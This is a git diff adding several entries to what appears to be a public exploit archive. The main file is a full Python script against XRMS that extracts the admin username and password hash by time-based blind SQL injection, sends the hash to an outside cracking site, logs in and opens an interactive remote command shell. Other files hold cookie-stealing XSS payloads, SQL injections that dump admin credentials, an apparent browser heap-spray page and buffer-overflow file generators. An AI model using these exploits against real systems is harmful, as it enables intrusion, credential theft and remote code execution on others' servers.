diff --git a/platforms/php/webapps/34452.py b/platforms/php/webapps/34452.py
new file mode 100755
index 000000000..dc24231d8
--- /dev/null
+++ b/platforms/php/webapps/34452.py
@@ -0,0 +1,233 @@
+#######################
+# XRMS Blind SQLi via $_SESSION poisoning, then command exec
+#########################
+
+import urllib
+import urllib2
+import time
+import sys
+
+usercharac = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','@','.','_','-','1','2','3','4','5','6','7','8','9','0']
+userascii = [97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 64, 46, 95, 45, 49, 50, 51, 52, 53, 54, 55, 56, 57, 48]
+def banner():
+	print """	    ____                                      
+	   / __/_  ______ _  _  ___________ ___  _____
+	  / /_/ / / / __ `/ | |/_/ ___/ __ `__ \/ ___/
+	 / __/ /_/ / /_/ / _>  </ /  / / / / / (__  ) 
+	/_/  \__,_/\__, (_)_/|_/_/  /_/ /_/ /_/____/  
+	             /_/                              
+	[+] fuq th3 w0rld, fuq ur m0m!\n"""
+
+def usage():
+	print "	[+] Info: Remote Command Execution via $_SESSION poisoning to SQLi to RCE"
+	print "	[+] Example:"
+	print "	[+] python " + sys.argv[0] + " domain.to/xrms"
+	quit()
+
+def sendhashaway(hash):
+	print " [+] Sending hash to icrackhash.com to be cracked."
+	data = None
+	headers = { 'Referer' : 'http://icrackhash.com/?mdhash=' + hash + '&type=MD5','User-Agent' : 'Mozilla','X-Requested-With' : 'XMLHttpRequest'}
+	url = 'http://www.icrackhash.com/?mdhash=' + hash + '&type=MD5'
+	gh = urllib2.Request(url,data,headers)
+	gh2 = urllib2.urlopen(gh)
+	output = gh2.read()
+	plaintext = getpositions(output,'<td><small><strong>','</strong>')
+	print " [-] Plaintext of hash: " +plaintext + "\n"
+	return plaintext
+
+def username(length):
+	length = length + 1
+	duser = []
+	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
+	found = 0
+	i = 1
+	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(username,"
+	payload2 = ",1)=CHAR("
+	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
+        for i in range(1,length):
+		found = 0
+		while(found != 1):
+			for f in range(0,len(userascii)):
+				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+					def http_error_302(self, req, fp, code, msg, headers):
+						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+						infourl.status = code
+						infourl.code = code
+						return infourl
+					http_error_300 = http_error_302    
+				class HeadRequest(urllib2.Request):
+					def get_method(self):
+						return "POST"
+				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
+				data = urllib.urlencode([('user_id',payload)])
+				url = 'http://'+domain+'/plugins/webform/new-form.php'
+				opener = urllib2.build_opener(LeHTTPRedirectHandler)
+				req = HeadRequest(url,data)
+				prepare = opener.open(req)
+				cookie1 = prepare.info()
+				cookie2pos1 = str(cookie1).find('PHPSESSID')
+				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+				line = 'XRMS' + line[9:]
+				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+				headers = { 'Cookie' : line }
+				data = None
+				start = time.time()
+				get = urllib2.Request(url,data,headers)
+				get.get_method = lambda: 'HEAD'
+				try:
+					execute = urllib2.urlopen(get)
+				except:
+					pass
+				elapsed = (time.time() - start)
+				if(elapsed > 1):
+					print "	Character found. Character is: " + usercharac[f]
+					duser.append(usercharac[f])
+					found = 1
+	return duser
+
+def getusernamelength():
+	found = 0
+	i = 1
+	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(LENGTH(username) = '"
+	payload2 = "',BENCHMARK(50000000,MD5(0x34343434)),NULL) FROM users-- -"
+	while (found != 1): 
+		class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+			def http_error_302(self, req, fp, code, msg, headers):
+				infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+				infourl.status = code
+				infourl.code = code
+				return infourl
+			http_error_300 = http_error_302    
+		class HeadRequest(urllib2.Request):
+			def get_method(self):
+				return "POST"
+		payload = payload1 + str(i) + payload2
+		data = urllib.urlencode([('user_id',payload)])
+		url = 'http://'+domain+'/plugins/webform/new-form.php'
+		opener = urllib2.build_opener(LeHTTPRedirectHandler)
+		req = HeadRequest(url,data)
+		prepare = opener.open(req)
+		cookie1 = prepare.info()
+		cookie2pos1 = str(cookie1).find('PHPSESSID')
+		cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+		line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+		line = 'XRMS' + line[9:]
+		url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+		headers = { 'Cookie' : line }
+		data = None
+		start = time.time()
+		get = urllib2.Request(url,data,headers)
+		get.get_method = lambda: 'HEAD'
+		try:
+			execute = urllib2.urlopen(get)
+		except:
+			pass
+		elapsed = (time.time() - start)
+		if(elapsed > 1):
+			print "	Length found at position: " + str(i)
+			found = 1
+			length = i
+			return length
+		i = i + 1
+
+def password(length):
+	length = length + 1
+	dpassword = []
+	#1) UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- -
+	found = 0
+	i = 1
+	payload1 = "1) UNION ALL SELECT 1,2,3,4,5,6,7,8,IF(SUBSTRING(password,"
+	payload2 = ",1)=CHAR("
+	payload3 = "),BENCHMARK(5000000,MD5(0x34343434)),NULL) FROM users-- -"
+        for i in range(1,length):
+		found = 0
+		while(found != 1):
+			for f in range(0,len(userascii)):
+				class LeHTTPRedirectHandler(urllib2.HTTPRedirectHandler):
+					def http_error_302(self, req, fp, code, msg, headers):
+						infourl = urllib2.addinfourl(fp, headers, req.get_full_url())
+						infourl.status = code
+						infourl.code = code
+						return infourl
+					http_error_300 = http_error_302    
+				class HeadRequest(urllib2.Request):
+					def get_method(self):
+						return "POST"
+				payload = payload1 + str(i) + payload2 + str(userascii[f]) + payload3
+				data = urllib.urlencode([('user_id',payload)])
+				url = 'http://'+domain+'/plugins/webform/new-form.php'
+				opener = urllib2.build_opener(LeHTTPRedirectHandler)
+				req = HeadRequest(url,data)
+				prepare = opener.open(req)
+				cookie1 = prepare.info()
+				cookie2pos1 = str(cookie1).find('PHPSESSID')
+				cookie2pos2 = str(cookie1).find("\n",cookie2pos1)
+				line = str(cookie1)[cookie2pos1:cookie2pos2 - 9]
+				line = 'XRMS' + line[9:]
+				url = 'http://'+domain+'/plugins/useradmin/fingeruser.php'
+				headers = { 'Cookie' : line }
+				data = None
+				start = time.time()
+				get = urllib2.Request(url,data,headers)
+				get.get_method = lambda: 'HEAD'
+				try:
+					execute = urllib2.urlopen(get)
+				except:
+					pass
+				elapsed = (time.time() - start)
+				if(elapsed > 1):
+					print "	Character found. Character is: " + usercharac[f]
+					dpassword.append(usercharac[f])
+					found = 1
+	return dpassword
+
+def login(domain,user,password):
+	cookie = "XRMS=iseeurgettinown4d"
+	url = 'http://'+domain+'/login-2.php'
+	headers = { 'Cookie' : cookie }
+	data = urllib.urlencode([('username',user),('password',password)])
+	a1 = urllib2.Request(url,data,headers)
+	a2 = urllib2.urlopen(a1)
+	output = a2.read()
+	if output.find('PEAR.php') > 0:
+		print "	[+] Logged In"
+
+def commandexec(domain,command):
+	cookie = "XRMS=iseeurgettinown4d"
+	cmd = urllib.urlencode([("; echo '0x41';" + command + ";echo '14x0';",None)])
+	headers = { 'Cookie' : cookie }
+	data = None
+	url = 'http://'+domain+'/plugins/useradmin/fingeruser.php?username=' + cmd
+	b1 = urllib2.Request(url,data,headers)
+	b2 = urllib2.urlopen(a1)
+	output = b2.read()
+	first = output.find('0x41') + 4
+	last = output.find('14x0') - 4
+	return output[first:last]
+
+banner()
+if len(sys.argv) < 2:
+	usage()
+domain = sys.argv[1]
+print "	[+] Grabbing username length"
+length = getusernamelength()
+print "	[+] Grabbing username characters"
+tmpuser = username(length)
+adminusr = "".join(tmpuser)
+print "	[+] Grabbing password hash"
+tmppass =  password(32)
+admpass = "".join(tmppass)
+print " [+] Admin username: "+ adminusr
+print "	[+] Admin password hash: " + admpass
+plain = sendhashaway(admpass)
+login(domain,adminusr,plain)
+while(quit != 1):
+	cmd = raw_input('	[+] Run a command: ')
+	if cmd == 'quit':
+		print "	[-] Hope you had fun :)"
+		quit = 1
+	if cmd != 'quit':
+		print "	[+] "+ commandexec(domain,cmd)
+
diff --git a/platforms/php/webapps/34453.txt b/platforms/php/webapps/34453.txt
new file mode 100755
index 000000000..e38b307f2
--- /dev/null
+++ b/platforms/php/webapps/34453.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42423/info
+
+PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+PaoBacheca 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/paobacheca/demo/index.php/"><script>alert(document.cookie);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34454.txt b/platforms/php/webapps/34454.txt
new file mode 100755
index 000000000..b776c94f2
--- /dev/null
+++ b/platforms/php/webapps/34454.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42423/info
+ 
+PaoBacheca is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+ 
+PaoBacheca 2.1 is vulnerable; other versions may also be affected. 
+
+http://www.example.com/paobacheca/demo/scrivi.php/"><script>alert(document.cookie);</script>
\ No newline at end of file
diff --git a/platforms/php/webapps/34455.txt b/platforms/php/webapps/34455.txt
new file mode 100755
index 000000000..5aebdf615
--- /dev/null
+++ b/platforms/php/webapps/34455.txt
@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/42424/info
+
+Rock Band CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/news.php?year=-2004+UNION+SELECT+1,2,3,4--
+http://www.example.com/news.php?id=-1+UNION+SELECT+1,2,3,4-- 
\ No newline at end of file
diff --git a/platforms/php/webapps/34456.txt b/platforms/php/webapps/34456.txt
new file mode 100755
index 000000000..ae27266f1
--- /dev/null
+++ b/platforms/php/webapps/34456.txt
@@ -0,0 +1,132 @@
+source: http://www.securityfocus.com/bid/42425/info
+
+JBoard is prone to multiple SQL-injection and cross-site scripting vulnerabilities because it fails to sanitize user-supplied input.
+
+Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, control how the site is rendered to the user, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+JBoard 0.2 is vulnerable; prior versions may also be affected.
+
+================================================
+JBoard <= 2.0 Commercial Version Sql/Xss Exploit
+================================================
+
+
+1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0                          
+0     _                   __           __       __                     1
+1   /&#039; \            __  /&#039;__`\        /\ \__  /&#039;__`\                   0
+0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
+1  \/_/\ \ /&#039; _ `\ \/\ \/_/_\_<_  /&#039;___\ \ \/\ \ \ \ \/\`&#039;__\          0
+0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
+1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
+0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
+1                  \ \____/ >> Exploit database separated by exploit   0
+0                   \/___/          type (local, remote, DoS, etc.)    1
+1                                                                      0
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-1
+
+#[+] Discovered By   : Inj3ct0r
+#[+] Site            : Inj3ct0r.com
+#[+] Support e-mail  : submit[at]inj3ct0r.com
+#[+] Visit : inj3ct0r.com , inj3ct0r.org , inj3ct0r.net
+
+
+Site product: http://allpublication.ru/
+Demo: http://allpublication.ru/board/demo/
+admin; admin
+Version: 2.0
+
+-----------------------------------------------------------------
+
+Xss Exploit:
+
+editform.php?notice=<script>alert(&#039;www.example.com&#039;)</script>
+
+*?user_title=</title><script>alert(&#039;www.example.org&#039;)</script>
+
+*any pages because vulnerability in inc/head.inc.php
+
+core/edit_user_message.php?edit_user_message="><script>alert(www.example.net)</script><noscript>
+
+------------------------------------------------------------------
+
+
+SQL-Inj3ct0r Exploit:  
+
+1) sboard.php
+
+elseif (!@$_GET[&#039;id_mess&#039;] && !@$_GET[&#039;id_cat&#039;] && (@$_GET[&#039;op&#039;] == "all_cat" || @$_GET[&#039;city&#039;])) require_once("core/all_cat.php");
+
+2) all_cat.php
+
+if ($c[&#039;print_top&#039;] == "yes") require_once("inc/top_add.inc.php"); 
+
+3) top_add.inc.php
+
+There is a request to the database with the parameter $_GET[&#039;city&#039;], which is never filtered
+
+if (@$_GET[&#039;city&#039;]) 
+{ 
+    $from_city_query = mysql_query ("SELECT city_name FROM jb_city WHERE city_translit = &#039;".$_GET[&#039;city&#039;]."&#039; LIMIT 1");  
+    if (mysql_num_rows ($from_city_query) == 1) 
+    { 
+        $from_city = mysql_fetch_assoc ($from_city_query); 
+        $city_from_search = " AND city = &#039;".$from_city[&#039;city_name&#039;]."&#039; "; 
+
+The result is used in the second query:
+
+ $top_add = mysql_query ("SELECT A.id as board_id, A.*, B.* FROM jb_board as A, jb_board_cat as B WHERE A.id_category = B.id AND old_mess = &#039;old&#039; ".@$city_from_search." ORDER by hits DESC LIMIT $limit");  
+if (mysql_num_rows($top_add)) 
+{ 
+?> 
+
+<H4><?=$lang[610]?></H4> 
+<table border="0" class="GRayBox" cellpadding="0" cellspacing="0"> 
+  <tr class="top"> 
+    <td class="img1">&nbsp;</td> 
+    <td class="img2">&nbsp;</td> 
+    <td class="img3">&nbsp;</td> 
+  </tr> 
+  <tr> 
+    <td class="imgL">&nbsp;</td> 
+    <td class="t"><a href="#"> 
+      <? 
+    while ($top = mysql_fetch_assoc ($top_add)) 
+    { 
+        $tip = str_replace("\r\n"," ", htmlspecialchars($top[&#039;text&#039;])); 
+        echo "<a href=\"".$h."/advertisement/nesting/".$top[&#039;id_category&#039;]."/kind/".$top[&#039;board_id&#039;]."/\" onmouseover=\"Tip(&#039;".$tip."&#039;)\"><strong>".$top[&#039;title&#039;]."</strong></a>"; 
+
+
+Request number 1:
+
+a &#039;UNION SELECT 1 --
+
+Request number 2:
+
+a &#039;UNION SELECT 1,2,3,4,5,6, concat_ws (0x3,login,password), 8,9,10,1 1,12,13,14,15,16,17,18,19, 20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34 FROM jb_admin --
+Transferred to the number (* 16):
+0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361745f7773283078332c6c6f67696e2c70617373776f7264292c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312c33322c33332c33342046524f4d206a625f61646d696e202d2d20
+
+As a result, we obtain the following query:
+
+sboard.php?city=a&#039;+union+select+0x612720554e494f4e2053454c45435420312c322c332c342c352c362c636f6e6361 745f7773283078332c6c6f67696e2c70617373776f7264292c 382c392c31302c31312c31322c31332c31342c31352c31362c 31372c31382c31392c32302c32312c32322c32332c32342c32 352c32362c32372c32382c32392c33302c33312c33322c3333 2c33342046524f4d206a625f61646d696e202d2d20% 20 -% 20
+
+-------------------------------------------------------------------
+
+SQL-Inj3ct0r Exploit:
+
+POST request to /core/select.php
+
+aaaaaaa &#039;UNION SELECT 1,2, concat_ws (0x3, login, password), 4,5,6 FROM jb_admin --
+Output will be the last element of the drop-down
+A vulnerable piece of code: paste the whole file)
+
+---------------------------------
+
+ThE End =]  Visit my proj3ct  :
+
+http://inj3ct0r.com
+http://inj3ct0r.org
+http://inj3ct0r.net
+
+
+# ~  - [ [ : Inj3ct0r : ] ]
diff --git a/platforms/php/webapps/34459.txt b/platforms/php/webapps/34459.txt
new file mode 100755
index 000000000..d62999cac
--- /dev/null
+++ b/platforms/php/webapps/34459.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42430/info
+
+Amiro.CMS is prone to multiple input-validation vulnerabilities including multiple cross-site scripting issues, an HTML-injection issue, and an information-disclosure issue.
+
+An attacker may leverage the issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is rendered to the user and disclose sensitive information which may aid in launching further attacks.
+
+Amiro.CMS 5.4.0 is affected; other versions may be vulnerable as well. 
+
+'status_msg' = a: 2: (s: 3: "sys"; a: 0: () s: 5: "plain"; a: 1: (i: 0; a: 2: (s: 3: "msg "; s: 68:" ONsec.ru - XSS test [ALERT] \ "); alert (document.cookie) / / alert ([/ ALERT]"; s: 4: "type"; s: 4: "none ";}}} 
\ No newline at end of file
diff --git a/platforms/php/webapps/34464.txt b/platforms/php/webapps/34464.txt
new file mode 100755
index 000000000..971a2c2b5
--- /dev/null
+++ b/platforms/php/webapps/34464.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42436/info
+
+SyntaxCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+SyntaxCMS 1.3 is vulnerable; prior versions may also be affected. 
+
+http://www.example.com/content/general/browse/?x=37&y=15&rows_per_page=10+ANY_SQL+--+&page=2 
\ No newline at end of file
diff --git a/platforms/windows/dos/34442.html b/platforms/windows/dos/34442.html
new file mode 100755
index 000000000..c0a4662cb
--- /dev/null
+++ b/platforms/windows/dos/34442.html
@@ -0,0 +1,21 @@
+source: http://www.securityfocus.com/bid/42418/info
+
+Kylinsoft InstantGet ActiveX control is prone to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data before copying it into an insufficiently sized memory buffer.
+
+An attacker can exploit this issue to execute arbitrary code within the context of the application, typically Internet Explorer, that uses the ActiveX control. Failed exploit attempts will result in denial-of-service conditions.
+
+Kylinsoft InstantGet 2.08 is vulnerable; other versions may also be affected.
+
+<object classid=&#039;clsid:98C92840-EB1C-40BD-B6A5-395EC9CD6510&#039; id=&#039;target&#039; />
+
+<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">
+
+<script language=&#039;vbscript&#039;>
+
+arg1=-2147483647
+
+target.ShowBar arg1 
+
+</script>
+</span></span>
+</code></pre>
diff --git a/platforms/windows/dos/34458.html b/platforms/windows/dos/34458.html
new file mode 100755
index 000000000..33b8d54ff
--- /dev/null
+++ b/platforms/windows/dos/34458.html
@@ -0,0 +1,82 @@
+<!doctype html>
+<html>
+<head>
+<meta http-equiv="Cache-Control" content="no-cache"/>
+<sc?ript >
+func?tion stc()
+{
+var Then = new Date();
+Then.setTime(Then.getTime() + 1000 * 3600 * 24 * 7 );
+document.cookie = "Cookie1=d93kaj3Nja3; expires="+ Then.toGMTString();
+}
+func?tion cid()
+{
+var swf = 0;
+try {
+swf = new ActiveXObject('ShockwaveFlash.ShockwaveFlash'); } catch (e) {
+}
+if (!swf)
+return 0;
+var cookieString = new String(document.cookie);
+if(cookieString.indexOf("d93kaj3Nja3") == -1)
+{stc(); return 1;}else{ return 0;}
+}
+String.prototype.repeat=func?tion (i){return new Array(isNaN(i)?1:++i).join(this);}
+var tpx=un?escape ("%u1414%u1414").repeat(0x60/4-1);
+var ll=new Array();
+for (i=0;i<3333;i++)ll.push(document.create?Element("img"));
+for(i=0;i<3333;i++) ll[i].className=tpx;
+for(i=0;i<3333;i++) ll[i].className="";
+CollectGarbage();
+func?tion b2()
+{
+try{xdd.re?placeNode(document.createTextNode(" "));}catch(exception){}
+try{xdd.outerText='';}catch(exception){}
+CollectGarbage();
+for(i=0;i<3333;i++) ll[i].className=tpx;
+}
+func?tion a1(){
+if (!cid())
+return;
+document.body.contentEditable="true";
+try{xdd.applyElement(document.create?Element("frameset"));}catch(exception){}
+try{document.selection.createRange().select();}catch(exception){}
+}
+</ sc?ript >
+</head>
+<body onload='setTimeout("a1();",2000);' onresize=b2()>
+<marquee id=xdd > </marquee>
+<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" width="1%" height="1%" id="FE">
+<param name="movie" value="storm.swf" />
+<param name="quality" value="high" />
+<param name="bgcolor" value="#ffffff" />
+<param name="allowScriptAccess" value="sameDomain" />
+<param name="allowFullScreen" value="true" />
+</object>
+</body>
+<body>
+<form name=loading>
+ˇˇ<p align=center> <font color="#0066ff" size="2"> Loading....,Please Wait</font> <font color="#0066ff" size="2" face="verdana"> ...</font>
+ˇˇˇˇ<input type=text name=chart size=46 style="font-family:verdana; font-weight:bolder; color:#0066ff; background-color:#fef4d9; padding:0px; border-style:none;">
+ˇˇˇˇ
+ˇˇˇˇ<input type=text name=percent size=47 style="color:#0066ff; text-align:center; border-width:medium; border-style:none;">
+ˇˇˇˇ<sc?ript > ˇˇ
+var bar=0ˇˇ
+var line="||"ˇˇ
+var amount="||"ˇˇ
+count()ˇˇ
+func?tion count(){ˇˇ
+bar=bar+2ˇˇ
+amount =amount + lineˇˇ
+document.loading.chart.value=amountˇˇ
+document.loading.percent.value=bar+"%"ˇˇ
+if (bar<99)ˇˇ
+{setTimeout("count()",500);}ˇˇ
+elseˇˇ
+{window.location = "http://www.google.com.hk";}ˇˇ
+}</ sc?ript >
+ˇˇ</p>
+</form>
+<p align="center"> Wart,<a style="text-decoration: none" href="http://www.google.com.hk"> <font color="#FF0000"> kick me</font> </a> .</p>
+</body>
+</html>
\ No newline at end of file
diff --git a/platforms/windows/dos/34460.py b/platforms/windows/dos/34460.py
new file mode 100755
index 000000000..3bd6aaafe
--- /dev/null
+++ b/platforms/windows/dos/34460.py
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/42434/info
+
+Sonique is prone to a remote stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.
+
+Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.
+
+Sonique 2.0 Beta Build 103 is vulnerable; other versions may also be affected. 
+
+#Date: 12/8/2010                                                                            
+#Author:Hamza_hack_dz & Black-liondz1                                                      
+#Software Link:Download: http://www.softpedia.com/progDownload/Sonique-2-Download-6707.html #                                                                          #
+#Version:sonique2                                                                           
+# web:www.sa-hacker.com/vb
+# Email:hamza_hack_dz@hotmail.com &b-l@ho9mail.com                                           
+
+                        
+#!/user/bin/python
+
+filename = "sa-hacker.xpl"
+
+junk = "\x41" * 500000
+
+exploit = junk
+
+textfile = open(filename,'w')
+textfile.write(exploit)
+textfile.close()
+
+
+# Inj3ct0r.com [2010-08-12]
\ No newline at end of file
diff --git a/platforms/windows/local/34463.py b/platforms/windows/local/34463.py
new file mode 100755
index 000000000..5f4d0801b
--- /dev/null
+++ b/platforms/windows/local/34463.py
@@ -0,0 +1,46 @@
+#----------------------------------------------------------------------------------------------------#
+# Exploit Title: HTML Help Workshop - (SEH) Buffer Overflow                                          #
+# Date: August 24 2014                                                                               #
+# Exploit Author: Moroccan Kingdom (MKD)                                                             #
+# Software Link: http://msdn.microsoft.com/en-us/library/windows/desktop/ms669985%28v=vs.85%29.aspx  #                                     #
+# Version: 1.4                                                                                       #
+# Tested on: Windows XP SP3/SP2 | Windows 7 64/32-bit  (eng)                                         #
+#----------------------------------------------------------------------------------------------------#
+
+import subprocess,time
+import sys,os
+
+if os.name == "nt" :
+   subprocess.call('cls', shell=True)
+   os.system("color c")
+else :
+   subprocess.call('clear', shell=True)
+
+time.sleep(1)
+
+print '''
+///////////////////////////////////////////////////////////////////////////////
+/                               M.O.R.O.C.C.A.N                               /
+/                                K.I.N.G.D.O.M                                /
+/                                    [MKD]                                    /
+/ CONTACT US : facebook.com/moroccankingdom024 | twitter.com/moroccankingdom  /
+/ To run this exploit Go to DOS and then go to the folder path program and    /
+/ run this command : hc | exm : hcc.exe AAAABBBCCCSSS...           /
+/////////////////////////////////////////////////////////////////////////////// '''
+
+JNK = "A" * 284
+NEH = "B" * 4                   
+SEH = "C" * 4                
+SHL = "S" * 400
+
+POC = JNK + NEH + SEH + SHL
+
+try :
+   file = open("poc.txt", "w")
+   file.write(POC)
+   file.close()
+   print "\n[*] file created successfully"
+except:
+   print "[#] error to create file"
+ 
+close = raw_input("\n[!] press any button to close()")
diff --git a/platforms/windows/remote/34437.txt b/platforms/windows/remote/34437.txt
new file mode 100755
index 000000000..a37548d0d
--- /dev/null
+++ b/platforms/windows/remote/34437.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/42377/info
+
+The Portable Document Format (PDF) specification is prone to a signature-collision attack when signing PDF documents.
+
+An attacker can exploit this issue to create PDF documents containing forged signatures. Successfully exploiting this issue will result in the application accepting the signature of a document as valid when it is not. This may result in a false sense of security; other attacks are also possible.
+
+All products conforming to the specification for signing PDF documents are affected by this issue. 
+
+http://www.exploit-db.com/sploits/34437.tar.gz
\ No newline at end of file